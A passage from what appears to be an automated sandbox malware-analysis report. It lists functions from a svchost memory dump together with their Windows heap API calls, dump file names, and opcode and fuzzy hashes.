                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7D3B4
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7D3B7
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1670920773-0
                                                                                                                                                                                                            • Opcode ID: 121c50ac3785073cf1e822029238d3db2390aeb27431e563befb30a8878f4b53
                                                                                                                                                                                                            • Instruction ID: b848486a1f158c6433e21d6dcf7b06956120b6300da42dc684efe6e88b722ed3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 121c50ac3785073cf1e822029238d3db2390aeb27431e563befb30a8878f4b53
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1F06D74E40362ABEB105F39AC48B977BECAF48686F940481E90ED3140E775C910AAA0
                                                                                                                                                                                                            Function 02CB1BF0 Relevance: 5.0, APIs: 4, Instructions: 24memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02CB1C05
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02CB1C08
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02CB1C15
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02CB1C18
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1670920773-0
                                                                                                                                                                                                            • Opcode ID: f4fb82d938ff516ed9fc9f7cc597840f4ed41ce2ee13c1e50acb16e997651bc0
                                                                                                                                                                                                            • Instruction ID: 9aba192d21fd338b10a677a2566ba91084e4345642c3fd3c61d2f9676863cdc5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4fb82d938ff516ed9fc9f7cc597840f4ed41ce2ee13c1e50acb16e997651bc0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BE08632FC526877C51226A66C0CF877B1CDFC1B72F094411F608D3141C660941096F0